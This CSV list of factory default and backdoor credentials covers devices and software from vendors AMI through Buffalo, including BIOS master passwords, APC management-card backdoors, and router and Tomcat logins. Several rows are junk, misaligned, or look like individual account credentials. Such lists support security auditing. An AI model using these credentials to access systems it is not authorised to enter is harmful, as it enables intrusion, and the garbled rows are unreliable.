BIOS,,Console,,AMI.KEY,Admin,, +ami,PC BIOS,,Console,,AMI.KEZ,Admin,, +ami,PC BIOS,,Console,,AMI?SW,Admin,, +ami,PC BIOS,,Console,,AMIAMI,Admin,, +ami,PC BIOS,,Console,,AMIDECOD,Admin,, +ami,PC BIOS,,Console,,AMIPSWD,Admin,, +ami,PC BIOS,,Console,,AMISETUP,Admin,, +ami,PC BIOS,,Console,,AMI_SW,Admin,, +ami,PC BIOS,,Console,,AMI~,Admin,, +ami,PC BIOS,,Console,,BIOS,Admin,, +ami,PC BIOS,,Console,,BIOSPASS,Admin,, +ami,PC BIOS,,Console,,CMOSPWD,Admin,, +ami,PC BIOS,,Console,,CONDO,Admin,, +ami,PC BIOS,,Console,,HEWITT RAND,Admin,, +ami,PC BIOS,,Console,,LKWPETER,Admin,, +ami,PC BIOS,,Console,,MI,Admin,, +ami,PC BIOS,,Console,,Oder,Admin,, +ami,PC BIOS,,Console,,PASSWORD,Admin,, +ami,PC BIOS,,Console,,aammii,Admin,, +ami,at 49,,,,,,, +amigo,ADSL Router,,,admin,epicrouter,,, +amitech,wireless router and access point 802.11g 802.11b,any,HTTP,admin,admin,Admin,Web interface is on 192.168.1.254 available on the LAN ports of the AP., +amptron,PC BIOS,,,,Polrty,,, +amptron,PC BIOS,,Admin,,Polrty,,, +amptron,PC BIOS,,Console,,Polrty,Admin,, +andover controls,Infinity,,any,acc,acc,,, +andovercontrols,Infinity,any,Console,acc,acc,Admin,Building managment system, +aoc,zenworks 4.0,,Multi,,admin,Admin,, +apache project,,,Apache,jj,,,, +apache,TomCat,,HTTP,admin,admin,,, +apache,TomCat,,HTTP,admin,tomcat,,, +apache,TomCat,,HTTP,role,changethis,,, +apache,TomCat,,HTTP,role1,role1,,, +apache,TomCat,,HTTP,root,changethis,,, +apache,TomCat,,HTTP,root,root,,, +apache,TomCat,,HTTP,tomcat,changethis,,, +apache,TomCat,,HTTP,tomcat,tomcat,,, +apache,Tomcat,,,admin,tomcat,,, +apache,Tomcat,,,role,changethis,,, +apache,Tomcat,,,role1,role1,,, +apache,Tomcat,,,root,changethis,,, +apache,Tomcat,,,tomcat,tomcat,,, +apache,jboss4,,jmx-console,admin,jboss4,,, +apc,9606 Smart Slot,,,,backdoor,,, +apc,9606 Smart Slot,,Telnet,,backdoor,Admin,, +apc,9606 Smart Slot,AOS 3.2.1 and AOS 3.0.3,Telnet,(any),TENmanUFactOryPOWER,,, +apc,AP9606 SmartSlot Web/SNMP Management Card,,AOS 3.2.1 and AOS 3.0.3,(any),TENmanUFactOryPOWER,,, +apc,AP9606,,,apc,apc,Admin,, +apc,Any,,,apcuser,apc,,, +apc,Call-UPS,,AP9608,,serial number of the Call-UPS,,, +apc,Call-UPS,AP9608,Console,,(Device Serial Number),Admin,, +apc,MasterSwitch,,AP9210,apc,apc,,, +apc,MasterSwitch,AP9210,,apc,apc,Admin,, +apc,PowerChute Bussiness Edition,,Installed program,Pingo,Ura,Admin access,, +apc,Powerchute Plus,,4.x for Netware 3.x/4.x,POWERCHUTE,APC,,, +apc,Powerchute Plus,4.x for Netwware 3.x/4.x,Console,POWERCHUTE,APC,Admin,, +apc,SNMP Adapter,,2.x,apc,apc,,, +apc,SNMP Adapter,2.x,,apc,apc,,, +apc,Share-UPS,,AP9207,,serial number of the Share-UPS,,, +apc,Share-UPS,AP9207,Console,,(Device Serial Number),Admin,, +apc,Smart UPS,,Multi,apc,apc,Admin,, +apc,Smartups 3000,,HTTP,apc,apc,Admin,, +apc,Smartups 5000,,HTTP,apc,apc,admin,, +apc,UPS,,,apc,apc,,, +apc,UPS,,Admin,apc,apc,,, +apc,UPS,,Telnet,apc,apc,Admin,, +apc,UPSes (Web/SNMP Mgmt Card),,HTTP,device,device,Admin,Secondary access account (next to apc/apc), +apc,USV Network Management Card,,,,TENmanUFactOryPOWER,,, +apc,USV Network Management Card,,SNMP,,TENmanUFactOryPOWER ,Admin,nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase, +apc,Web/SNMP Management Card,,AP9606,apc,apc,,, +apple computer,Airport,,,,public,,, +apple computer,Network Assistant,,,,xyzzy,,, +apple computer,Remote Desktop,,,,xyzzy,,, +apple,AirPort Base Station (Graphite),,2,,public,,, +apple,AirPort Base Station (Graphite),2,Multi,,public,public,See Apple article number 58613 for details, +apple,Airport Base Station (Dual Ethernet),,2,,password,,, +apple,Airport Base Station (Dual Ethernet),2,Multi,,password,Guest,See Apple article number 106597 for details, +apple,Airport Extreme Base Station,,2,,admin,,, +apple,Airport Extreme Base Station,2,Multi,,admin,Guest,see Apple article number 107518 for details, +apple,Airport,,,,public,,1.1, +apple,Airport,,Administrative,admin,public,,, +apple,Airport,,Other,admin,public,Administrative,, +apple,Airport,5,1.0.09,Multi,root,admin,, +apple,Network Assistant,,,None,xyzzy,Admin,3.X, +apple,Remote Desktop,,,,xyzzy,Admin,, +apple,iPod Touch,,,root/mobile,alpine,,, +arcor,Easybox,all,http://192.168.2.1,root,123456,Root,, +areca,RAID controllers,,Console,admin,0,Admin,, +arescom,modem/router ,10XX,Telnet,,atc123,Admin,, +arlotto,SG205,,HTTP,admin,123456,https://192.168.2.1,, +arlotto,SG205,,https://192.168.2.1,admin,123456,,, +armenia,Forum,,No,admin,admin,,, +arrowpoint,Any,,,admin,system,Admin,, +arrowpoint,Unknown,,,,,,, +arrowpoint,Unknown,,,admin,system,,, +arrowpoint,Various,,,,,Admin,, +arrowpoint,windows xp,all,192.168.0.1,admin,arrowpoint,,, +artem,ComPoint - CPD-XT-b,CPD-XT-b,Telnet,,admin,Admin,, +asante,FM2008,,Multi,admin,asante,Admin,, +asante,FM2008,,Telnet,superuser,,Admin,, +asante,FM2008,01.06,Telnet,superuser,asante,Admin,, +asante,IntraStack,,,IntraStack,Asante,,, +asante,IntraStack,,Admin,IntraStack,Asante,,, +asante,IntraStack,,multi,IntraStack,Asante,Admin,, +asante,IntraSwitch,,,IntraSwitch,Asante,,, +asante,IntraSwitch,,Admin,IntraSwitch,Asante,,, +asante,IntraSwitch,,multi,IntraSwitch,Asante,Admin,, +ascend,All TAOS models,,,admin,Ascend,,all, +ascend,Router,,,,ascend,,, +ascend,Router,,Admin,,ascend,,, +ascend,Router,,Telnet,,ascend,Admin,, +ascend,Sahara,,,root,ascend,,, +ascend,Sahara,,Multi,root,ascend,,, +ascend,Yurie,,,readonly,lucenttech2,,, +ascend,Yurie,,,readwrite,lucenttech1,,, +ascend,Yurie,,Multi,readonly,lucenttech2,,, +ascend,Yurie,,Multi,readwrite,lucenttech1,,, +ascom,Ascotel PBX,,ALL,,3ascotel,,, +ascom,Ascotel PBX,ALL,Multi,,3ascotel,Admin,, +asdsa,sadsa,,asdsad,12321,sadsad,,, +asmack,router,ar804u,HTTP,admin,epicrouter,Admin,, +asmax,AR701u / ASMAX AR6024,,HTTP,admin,epicrouter,Admin,, +asmax,AR800C2,,HTTP,admin,epicrouter,Admin,, +asmax,Ar-804u,,HTTP,admin,epicrouter,Admin,, +aspect,ACD,,6,DTA,TJM,,, +aspect,ACD,,6,customer,,,, +aspect,ACD,,7,DTA,TJM,,, +aspect,ACD,,8,DTA,TJM,,, +aspect,ACD,,User,DTA,TJM,,, +aspect,ACD,,User,customer,,,, +aspect,ACD,6,HTTP,customer,,User,views error logs, +aspect,ACD,6,Oracle,DTA,TJM,User,, +aspect,ACD,7,Oracle,DTA,TJM,User,, +aspect,ACD,8,Oracle,DTA,TJM,User,, +ast,PC BIOS,,,,SnuFG5,,, +ast,PC BIOS,,Admin,,SnuFG5,,, +ast,PC BIOS,,Console,,SnuFG5,Admin,, +ast,Powerexec 4/25sl,,Multi,,,Admin,, +ast,powerexec 4/25sl,,,,,,, +ast,powerexec 4/25sl,,Admin,,,,, +asus,6310EV,,,adsl,adsl1234,,, +asus,6310EV,,Multi,adsl,adsl1234,,, +asus,ACPIBIOS,,,,,,, +asus,L3800,,,,,,, +asus,P5P800,,Multi,,admin,User,, +asus,WL-300,All,HTTP,admin,admin,Admin,, +asus,WL-500G Deluxe,,HTTP,admin,admin,Admin,, +asus,WL-500G,,HTTP,admin,admin,Admin,, +asus,WL-500G,1.7.5.6,HTTP,admin,admin,Admin,, +asus,WL-503G,All,HTTP,admin,admin,Admin,, +asus,WL-520G,,HTTP,admin,admin,Admin,, +asus,WL-HDD2.5,,,admin,admin,Admin,Default IP 192.168.1.220, +aszs,graphick,,jkl,Administrator,admin,,, +at&,T,,mcp,Console,,,, +at&t,3B2 Firmware,,,,mcp,,, +atcom,AG-168FC,,http://192.168.1.100,,12345678,Administration,, +atlantis,A02-RA141,,Multi,admin,atlantis,Admin,, +atlantis,I-Storm Lan Router ADSL ,,Multi,admin,atlantis,Admin,, +atlantis,Web Share RB,Web Share RB,http://192.168.1.1,santus,marika,,, +att,3B2 Firmware,,Console,,mcp,Admin,, +att,EP5962 2-Line Cordless Phone System,,by telephone,,5000,Mailbox access,, +att,Starlan SmartHUB,,,N/A,manager,,9.9, +attachmate,Attachmate Gateway,,,,PASSWORD,,, +attachmate,Attachmate Gateway,,Console,,PASSWORD,Admin,, +audioactive,MPEG Realtime Encoders,,,,telos,,, +audioactive,MPEG Realtime Encoders,,Telnet,,telos,Admin,, +autodesk,Autocad,,,autocad,autocad,,, +autodesk,Autocad,,Multi,autocad,autocad,User,, +autodesk,Autocad,,User,autocad,autocad,,, +avaya,4602 SIP Telephone,1.1.HTTP,admin,barney,,,, +avaya,CMS Supervisor,,11,root,cms500,,, +avaya,CMS Supervisor,11,Console,root,cms500,Admin,, +avaya,Cajun P33x,,Admin,,admin,,, +avaya,Cajun P33x,,firmware before 3.11.0,,admin,,, +avaya,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,, +avaya,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,check the Bugtraq archives for more information, +avaya,Cajun Pxxx,,,root,root,,, +avaya,Cajun Pxxx,,Admin,root,root,,, +avaya,Cajun Pxxx,,Multi,root,root,Admin,, +avaya,Cajun,,Admin,,,,, +avaya,Cajun,,Developer,diag,danger,,, +avaya,Cajun,,Developer,manuf,xxyyzz,,, +avaya,Cajun,,P550R P580 P880 and P882,diag,danger,,, +avaya,Cajun,,P550R P580 P880 and P882,manuf,xxyyzz,,, +avaya,Cajun,,P550R/P580/P880/P882,,,,, +avaya,Cajun,P550R P580 P880 and P882,Multi,diag,danger,Developer,, +avaya,Cajun,P550R P580 P880 and P882,Multi,manuf,xxyyzz,Developer,, +avaya,Cajun,P550R/P580/P880/P882,Telnet,,,Admin,, +avaya,Definity,,Admin,craft,,,, +avaya,Definity,,G3Si,craft,,,, +avaya,Definity,,Multi,dadmin,dadmin01,Admin,, +avaya,Definity,G3Si,Multi,craft,,Admin,, +avaya,IMD,,,admin,admin123,Admin,, +avaya,IP Office,500, 406,Default IP: 192.168.42.1, you can use ISDN modem to dial into remote systems- try last few numbers of ranges eg. xxxxxxxx99 or xxxxxxxx98, Administrator,Admin, +avaya,Pxxx,,5.2.14,diag,danger,,, +avaya,Pxxx,,5.2.14,manuf,xxyyzz,,, +avaya,Pxxx,,Admin,diag,danger,,, +avaya,Pxxx,,Admin,manuf,xxyyzz,,, +avaya,Pxxx,5.2.14,Multi,diag,danger,Admin,, +avaya,Pxxx,5.2.14,Multi,manuf,xxyyzz,Admin,, +avaya,Routers,Various,telnet,root,root,Admin,, +avaya,definity,,Admin,craft,crftpw,,, +avaya,definity,,up to rev. 6,craft,crftpw,,, +avaya,definity,up to rev. 6,any,craft,crftpw,Admin,, +avaya,g3R,,Admin,root,ROOT500,,, +avaya,g3R,,v6,root,ROOT500,,, +avaya,g3R,v6,Console,root,ROOT500,Admin,, +avaya,g3si,,,,,,, +avaya,routers,,,root,root,,, +avenger news system (ans),ANS,,,,Administrative,,, +avengernewssystem,Avenger News System,,HTTP,,Administrative,,default string: admin:aaLR8vE.jjhss:root@127.0.0.1 pass file is located at ans_data/ans.passwd (relative to ans.pl location), +award,6,,,,,,, +award,6.00PG,,,,,,, +award,BIOS,,,,lkwpeter,,, +award,BIOS,,Admin,,lkwpeter,,, +award,Bios,,6,,,,, +award,PC BIOS,,,,1322222,,, +award,PC BIOS,,,,SER,,, +award,PC BIOS,,,AWARD_SW,,,, +award,PC BIOS,,Admin,,01322222,,, +award,PC BIOS,,Admin,,256256,,, +award,PC BIOS,,Admin,,?award,,, +award,PC BIOS,,Admin,,AWARD_SW,,, +award,PC BIOS,,Admin,,BIOS,,, +award,PC BIOS,,Admin,,CONCAT,,, +award,PC BIOS,,Admin,,CONDO,,, +award,PC BIOS,,Admin,,HELGA-S,,, +award,PC BIOS,,Admin,,HEWITT RAND,,, +award,PC BIOS,,Admin,,HLT,,, +award,PC BIOS,,Admin,,PASSWORD,,, +award,PC BIOS,,Admin,,SER,,, +award,PC BIOS,,Admin,,SKY_FOX,,, +award,PC BIOS,,Admin,,SWITCHES_SW,,, +award,PC BIOS,,Admin,,SZYX,,, +award,PC BIOS,,Admin,,Sxyz,,, +award,PC BIOS,,Admin,,TTPTHA,,, +award,PC BIOS,,Admin,,TzqF,,, +award,PC BIOS,,Admin,,aLLy,,, +award,PC BIOS,,Admin,,aPAf,,, +award,PC BIOS,,Admin,,admin,,, +award,PC BIOS,,Admin,,alfarome,,, +award,PC BIOS,,Admin,,award,,, +award,PC BIOS,,Admin,,awkward,,, +award,PC BIOS,,Admin,,biosstar,,, +award,PC BIOS,,Admin,,biostar,,, +award,PC BIOS,,Admin,,g6PJ,,, +award,PC BIOS,,Admin,,h6BB,,, +award,PC BIOS,,Admin,,j09F,,, +award,PC BIOS,,Admin,,j256,,, +award,PC BIOS,,Admin,,j262,,, +award,PC BIOS,,Admin,,j322,,, +award,PC BIOS,,Admin,,j64,,, +award,PC BIOS,,Admin,,lkw peter,,, +award,PC BIOS,,Admin,,lkwpeter,,, +award,PC BIOS,,Admin,,setup,,, +award,PC BIOS,,Admin,,t0ch20x,,, +award,PC BIOS,,Admin,,t0ch88,,, +award,PC BIOS,,Admin,,wodj,,, +award,PC BIOS,,Admin,,zbaaaca,,, +award,PC BIOS,,Console,,(eight spaces),Admin,The password is eight spaces on some versions, +award,PC BIOS,,Console,,01322222,Admin,, +award,PC BIOS,,Console,,1322222,Admin,, +award,PC BIOS,,Console,,256256,Admin,, +award,PC BIOS,,Console,,589589,Admin,, +award,PC BIOS,,Console,,589721,Admin,, +award,PC BIOS,,Console,,595595,Admin,, +award,PC BIOS,,Console,,598598,Admin,, +award,PC BIOS,,Console,,?award,Admin,, +award,PC BIOS,,Console,,ALFAROME,Admin,, +award,PC BIOS,,Console,,ALLY,Admin,, +award,PC BIOS,,Console,,ALLy,Admin,, +award,PC BIOS,,Console,,AWARD PW,Admin,, +award,PC BIOS,,Console,,AWARD SW,Admin,, +award,PC BIOS,,Console,,AWARD?SW,Admin,, +award,PC BIOS,,Console,,AWARD_PW,Admin,, +award,PC BIOS,,Console,,AWARD_SW,Admin,, +award,PC BIOS,,Console,,AWKWARD,Admin,, +award,PC BIOS,,Console,,BIOS,Admin,, +award,PC BIOS,,Console,,BIOSTAR,Admin,, +award,PC BIOS,,Console,,CONCAT,Admin,, +award,PC BIOS,,Console,,CONDO,Admin,, +award,PC BIOS,,Console,,Condo,Admin,, +award,PC BIOS,,Console,,HELGA-S,Admin,, +award,PC BIOS,,Console,,HEWITT RAND,Admin,, +award,PC BIOS,,Console,,HLT,Admin,, +award,PC BIOS,,Console,,J256,Admin,, +award,PC BIOS,,Console,,J262,Admin,, +award,PC BIOS,,Console,,KDD,Admin,, +award,PC BIOS,,Console,,LKWPETER,Admin,, +award,PC BIOS,,Console,,Lkwpeter,Admin,, +award,PC BIOS,,Console,,PASSWORD,Admin,, +award,PC BIOS,,Console,,PINT,Admin,, +award,PC BIOS,,Console,,SER,Admin,, +award,PC BIOS,,Console,,SKY_FOX,Admin,, +award,PC BIOS,,Console,,SWITCHES_SW,Admin,, +award,PC BIOS,,Console,,SW_AWARD,Admin,, +award,PC BIOS,,Console,,SXYZ,Admin,, +award,PC BIOS,,Console,,SZYX,Admin,, +award,PC BIOS,,Console,,Sxyz,Admin,, +award,PC BIOS,,Console,,TTPTHA,Admin,, +award,PC BIOS,,Console,,TzqF,Admin,, +award,PC BIOS,,Console,,ZAAAADA,Admin,, +award,PC BIOS,,Console,,ZAAADA,Admin,, +award,PC BIOS,,Console,,ZBAAACA,Admin,, +award,PC BIOS,,Console,,ZJAAADC,Admin,, +award,PC BIOS,,Console,,_award,Admin,, +award,PC BIOS,,Console,,aLLY,Admin,, +award,PC BIOS,,Console,,aLLy,Admin,, +award,PC BIOS,,Console,,aPAf,Admin,, +award,PC BIOS,,Console,,admin,Admin,, +award,PC BIOS,,Console,,alfarome,Admin,, +award,PC BIOS,,Console,,award,Admin,, +award,PC BIOS,,Console,,award.sw,Admin,, +award,PC BIOS,,Console,,award_?,Admin,, +award,PC BIOS,,Console,,award_ps,Admin,, +award,PC BIOS,,Console,,awkward,Admin,, +award,PC BIOS,,Console,,biosstar,Admin,, +award,PC BIOS,,Console,,biostar,Admin,, +award,PC BIOS,,Console,,condo,Admin,, +award,PC BIOS,,Console,,d8on,Admin,, +award,PC BIOS,,Console,,djonet,Admin,, +award,PC BIOS,,Console,,efmukl,Admin,, +award,PC BIOS,,Console,,g6PJ,Admin,, +award,PC BIOS,,Console,,h6BB,Admin,, +award,PC BIOS,,Console,,j09F,Admin,, +award,PC BIOS,,Console,,j256,Admin,, +award,PC BIOS,,Console,,j262,Admin,, +award,PC BIOS,,Console,,j322,Admin,, +award,PC BIOS,,Console,,j64,Admin,, +award,PC BIOS,,Console,,kdd,Admin,, +award,PC BIOS,,Console,,lkw peter,Admin,, +award,PC BIOS,,Console,,lkwpeter,Admin,, +award,PC BIOS,,Console,,lkwpeter,Admin,Note - After 1996-12-19 Award required each OEM to set their own password, +award,PC BIOS,,Console,,pint,Admin,, +award,PC BIOS,,Console,,setup,Admin,, +award,PC BIOS,,Console,,sxyz,Admin,, +award,PC BIOS,,Console,,t0ch20x,Admin,, +award,PC BIOS,,Console,,t0ch88,Admin,, +award,PC BIOS,,Console,,wodj,Admin,, +award,PC BIOS,,Console,,zbaaaca,Admin,, +award,PC BIOS,,Console,,zjaaadc,Admin,, +award,award,,6,,,,, +award,bios,,1.0A,,,,, +award,bios,,4.6,admin,admin,,, +award,v4.51PG,,Admin,,SY_MB,,, +award,v4.51PG,,v4.51PG,,SY_MB,,, +award,v4.51PG,v4.51PG,Multi,,SY_MB,Admin,, +axent,NetProwler manager,,,administrator,admin,,WinNT, +axis,200 Network Camera,,,root,pass,,, +axis,200 V1.32,,,admin,,,, +axis,200+ Network Camera,,,root,pass,,, +axis,2100 Network Camera,,,root,pass,,, +axis,2110 Network Camera,,,root,pass,,, +axis,2120 Network Camera,,,root,pass,,, +axis,2420 Network Camera,,,root,pass,,, +axis,540 Print Server,,Multi,root,pass,Admin,, +axis,540+ Print Server,,Multi,root,pass,Admin,, +axis,542 Print Server,,Multi,root,pass,Admin,, +axis,All Axis Printserver,All,Multi,root,pass,Admin,, +axis,NETCAM,,200/240,root,pass,,, +axis,NETCAM,,Admin,root,pass,,, +axis,NETCAM,200/240,,root,pass,,, +axis,NETCAM,200/240,Telnet,root,pass,Admin,, +axis,NPS 530,,,root,pass,,5.02, +axis,StorPoint CD100,,,root,pass,,4.28, +axis,StorPoint CDE100,,,root,pass,,, +axis,StorPoint NAS 100,,,root,pass,,, +axis,Webcams,,HTTP,root,pass,Admin,, +axus,AXUS YOTTA,,Multi,,0,Admin,Storage DAS SATA to SCSI/FC, +aztech,DSL-600E,,HTTP,admin,admin,Admin,, +aztech,windows xp, all models,38.4.2,192.168.1.1,admin,admin,, +backtrack,backtrack 4,,CLI,root,toor,,, +barracudanetworks,Barracuda Spam Firewall 300,,http://:8000,admin,admin,full admin access,, +barracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://:8080,admin,adminbn99,full admin access,, +barracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://:8080,guest,bnadmin99,guest access - some information disclosure,, +barracudanetworks,Barracuda Spyware Firewall,,http://:8000,admin,admin,full admin access,, +bauschdatacom,Proxima PRI ADSL PSTN Router4 Wireless,,Multi,admin,epicrouter,Admin,, +bay networks,Router,,,Manager,,,, +bay networks,Router,,,User,,,, +bay networks,Router,,Admin,Manager,,,, +bay networks,Router,,User,User,,,, +bay networks,SuperStack II,,,security,security,,, +bay networks,SuperStack II,,Admin,security,security,,, +bay networks,Switch,,350T,,NetICs,,, +bay networks,Switch,,Admin,,NetICs,,, +baynetworks,ASN / ARN Routers,,,Manager,Manager,,Any, +baynetworks,Accelar 1xxx switches,,,rwa,rwa,,Any, +baynetworks,Remote Annex 2000,,,admin,IP address,,Any, +baynetworks,Router,,,User,,User,, +baynetworks,Router,,Telnet,Manager,,Admin,, +baynetworks,Router,,Telnet,User,,User,, +baynetworks,SuperStack II,,,security,security,Admin,, +baynetworks,SuperStack II,,Telnet,security,security,Admin,, +baynetworks,Switch,350T,,,NetICs,Admin,, +baynetworks,Switch,350T,Telnet,,NetICs,Admin,, +bea,WebLogic Process Integrator,,2.0,admin,security,,, +bea,WebLogic Process Integrator,,2.0,joe,password,,, +bea,WebLogic Process Integrator,,2.0,mary,password,,, +bea,WebLogic Process Integrator,,2.0,system,security,,, +bea,WebLogic Process Integrator,,2.0,wlcsystem,wlcsystem,,, +bea,WebLogic Process Integrator,,2.0,wlpisystem,wlpisystem,,, +bea,WebLogic,,,system,weblogic,,, +bea,WebLogic,,Admin,system,weblogic,,, +bea,WebLogic,,https,system,weblogic,Admin,, +bea,WebLogic,9.0 beta (Diablo),,weblogic,weblogic,,, +bea,Weblogic Process Integrator,2.0,,admin,security,,, +bea,Weblogic Process Integrator,2.0,,joe,password,,, +bea,Weblogic Process Integrator,2.0,,mary,password,,, +bea,Weblogic Process Integrator,2.0,,system,security,,, +bea,Weblogic Process Integrator,2.0,,wlcsystem,wlcsystem,,, +bea,Weblogic Process Integrator,2.0,,wlpisystem,wlpisystem,,, +bea,Weblogic,,,system,weblogic,,5.1, +becu,accpints summary,,,musi1921,Musii%1921,,, +beetal,220x ADSL router,any,http://192.168.1.1,admin,password,admin,should be same for all routers, +belkin,Belkin_N+_61F980,,Password,Belkin_N+_61F980,,,, +belkin,F1PG200ENau,,,,admin,,, +belkin,F5D5231-4,,http://192.168.2.1,,,Administration,, +belkin,F5D6130,,,,MiniAP,,, +belkin,F5D6130,,Admin,,MiniAP,,, +belkin,F5D6130,,SNMP,,MiniAP,Admin,Wireless Acess Point IEEE802.11b, +belkin,F5D6231-4 Router,,,,,,, +belkin,F5D6231-4,,V1.0 - 2.0,,,,, +belkin,F5D7150,FB,Multi,,admin,Admin,, +belkin,F5D7230-4 Router,,,,,,, +belkin,F5D7231-4,,http://192.168.2.1,,,Administration,, +belkin,F5D7234 4V1,1002,,insight_wifi_1902,lgibson5405,,, +belkin,F5D8230-4,,http://192.168.2.1,,,Administration,, +belkin,F5D9230-4,,http://192.168.2.1,user:,,Administration,, +belkin,F5U025 USB Flash drive,,,,1111,,, +belkin,F8T030 Bluetooth AP,,,guest,guest,,Bluetooth passkey: belkin, +belkin,P74476au,,http://10.0.0.2,admin,password,,, +belkin,PRO 3 KVM switch,,Console,admin,belkin,Admin,, +belkin,Wireless ADSL Modem/Router,,Full,admin,,,, +belkin,Wireless ADSL Modem/Router,,Multi,admin,,Full,, +belkin,f5d9230-4,,192.168.2.1,admin,admin,,, +benq,awl 700 wireless router,1.3.6 Beta-002,Multi,admin,admin,Admin,, +bestpractical,RT,,,root,password,,, +bestpractical,RT,,HTTP,root,password,Admin,, +betabrite,1026,,,,LLLLLL,Sign programming,Reset sign password, +betabrite,1036,,,,LLLLLL,Sign programming,Reset sign password, +betabrite,1040,,,,LLLLLL,Sign programming,Reset sign password, +betabrite,Prism 1196,,,,LLLLLL,Sign programming,Reset sign password, +betabrite,Prism full-colour LED sign,,,,,Sign programming,The sign has no password by default but if it does you can reset it by entering LLLLLL then a new password at the password prompt. Password is always 6 characters., +bewan,Wireless Routers,,,bewan,bewan,Admin,, +billion,BiPAC 5100,,HTTP,admin,admin,Admin,, +billion,BiPAC 5102,,http://192.168.1.254,admin,admin,Administration,, +billion,BiPAC 640 AC,640AE100,HTTP,,,Admin,, +billion,BiPAC 6600,,http://192.168.1.254,,,Administration,, +billion,BiPAC 7202G,,http://192.168.1.254,admin,admin,Administration,, +billion,BiPAC 7402VGP,,http://192.168.1.254,admin,admin,Administration,, +bintec,Bianca/Brick,,XM-5.1,,snmp-Trap,,, +bintec,Bianca/Brick,,read/write,,snmp-Trap,,, +bintec,Bianca/Brick,XM-5.1,SNMP,,snmp-Trap,read/write,, +bintec,Bianka ,,admin bintec,Admin,No,,, +bintec,Bianka Routers,,,admin,bintec,,, +bintec,Bianka Routers,,Admin,admin,bintec,,, +bintec,Bianka Routers,,Multi,admin,bintec,Admin,, +bintec,all Routers,,,admin,bintec,,Any, +bintec,x1200,37834,Multi,admin,bintec,Admin,, +bintec,x2300i,37834,Multi,admin,bintec,Admin,, +bintec,x3200,37834,Multi,admin,bintec,Admin,, +biodata,BIGfire,,,,Babylon,,, +biodata,Babylon,,,,Babylon,,, +biodata,Bigfire +,,Admin,config,biodata,,, +biodata,Bigfire +,,Multi,config,biodata,Admin,, +biostar,PC BIOS,,,,Biostar,,, +biostar,PC BIOS,,Admin,,Biostar,,, +biostar,PC BIOS,,Admin,,Q54arwms,,, +biostar,PC BIOS,,Console,,Biostar,Admin,, +biostar,PC BIOS,,Console,,Q54arwms,Admin,, +bizdesign,ImageFoliio,,2.2,Admin,ImageFolio,,, +bizdesign,ImageFolio Pro,,2.2,Admin,ImageFolio,,, +bizdesign,ImageFolio Pro,2.2,HTTP,Admin,ImageFolio,Admin,default admin page is:/cgi-bidmidmin.cgi, +bizdesign,ImageFolio,2.2,HTTP,Admin,ImageFolio,Admin,, +blackberry,Pearl,,,Password Keeper,By default has no password, +blackbox,BLACK BOX ServSensor JR,,,Administrator,public,,, +blackbox,BLACK BOX ServSensor JR,v2.0,HTTP,Administrator,public,,, +blackwidowwebdesignltd,Saxon,5.4,http,admin,nimda,Admin,, +bluecoatsystems,ProxySG,3.x,HTTP,admin,articon,Admin,access to command line interface via ssh and web gui, +bmc software,Patrol,,Admin,Administrator,the same all over,,, +bmc software,Patrol,,all,Administrator,the same all over,,, +bmc,Patrol,,6,patrol,patrol,,, +bmc,Patrol,,User,patrol,patrol,,, +bmc,Patrol,6.0,Multi,patrol,patrol,User,, +bmc,Patrol,all,BMC unique,Administrator,the same all over,Admin,this default user normally for ALL system in this area with one Password, +borland,Interbase,,,,,,, +borland,Interbase,,,,,,Any, +borland,Interbase,,,SYSDBA,masterkey,,any, +borland,Interbase,,,politcally,correct,,Any, +borland,Interbase,,,politically,correct,,, +borri,CS131,all versions,http,admin,UpsMon,,, +boson,router simulator,,Admin,,,,, +boson,router simulator,3.66,Multi,,,Admin,, +breezecom,Breezecom Adapters,,2.x,,laflaf,,, +breezecom,Breezecom Adapters,,3.x,,Master,,, +breezecom,Breezecom Adapters,,4.4.x,,Helpdesk,,, +breezecom,Breezecom Adapters,,4.x,,Super,,, +breezecom,Breezecom Adapters,,Admin,,Master,,, +breezecom,Breezecom Adapters,,Admin,,Super,,, +breezecom,Breezecom Adapters,,Admin,,laflaf,,, +breezecom,Breezecom Adapters,2.x,,,laflaf,,, +breezecom,Breezecom Adapters,2.x,,,laflaf,Admin,, +breezecom,Breezecom Adapters,3.x,,,Master,,, +breezecom,Breezecom Adapters,3.x,,,Master,Admin,, +breezecom,Breezecom Adapters,4.4.x,Console,,Helpdesk,Admin,, +breezecom,Breezecom Adapters,4.x,,,Super,,, +breezecom,Breezecom Adapters,4.x,,,Super,Admin,, +breezecom,SA10,,,,,,, +broadlogic,XLT router,,HTTP,webadmin,webadmin,Admin,, +broadlogic,XLT router,,Telnet,admin,admin,Admin,, +broadlogic,XLT router,,Telnet,installer,installer,Admin,, +broadmax,LinkMax HSA300A-2,,http://192.168.0.1,broadmax,broadmax,Admin,You need to put the IP as Gateway in TCPIP settings and 192.168.0.2 as your assigned IP., +brocade,Fabric OS,,3.x,admin,password,,, +brocade,Fabric OS,,3.x,root,fivranne,,, +brocade,Fabric OS,,All,root,fivranne,,, +brocade,Fabric OS,,Multi,admin,password,Admin,Gigabit SAN, +brocade,Fabric OS,All,Multi,root,fibranne,Admin,, +brocade,Fabric OS,All,Multi,root,fivranne,Admin,Gigiabit SAN (), +brocade,Silkworm,all,Multi,admin,password,Admin,Also on other Fiberchannel switches, +brother,HL-1270n,,,,access,,, +brother,HL-1270n,,Multi,,access,network board access,, +brother,HL-1270n,,network board access,,access,,, +brother,HL-3040CN,,,admin,access,,, +brother,MFC Network-capable printers,all versions,http,admin,access,,, +brother,MFC-8860DB,,,admin,access,,, +brother,NC-3100h,,,,access,,, +brother,NC-3100h,,,,access,network board access,, +brother,NC-3100h,,network board access,,access,,, +brother,NC-4100h,,,,access,,, +brother,NC-4100h,,,,access,network board access,, +brother,NC-4100h,,network board access,,access,,, +brother,QL-580N,,,admin,access,,, +bt,HomeHub,,192.168.1.254,admin,admin,Admin,, +bt,Voyager 2000,,,admin,admin,,, +bt,Voyager 2000,,,admin,admin,Admin,, +bt,Voyager 240,,,admin,admin,Admin,, +buffalo,AirStation WLA-L11,,,root,,,Root acct cannot be changed, no password by default, +buffalo,BBR-4MG and BBR-4HG,ALL,HTTP,root,,Admin,, +buffalo,WHR3-G54 Router,,,root,,,, +buffalo,Wireless Broadband Base Station-g ,WLA-G54 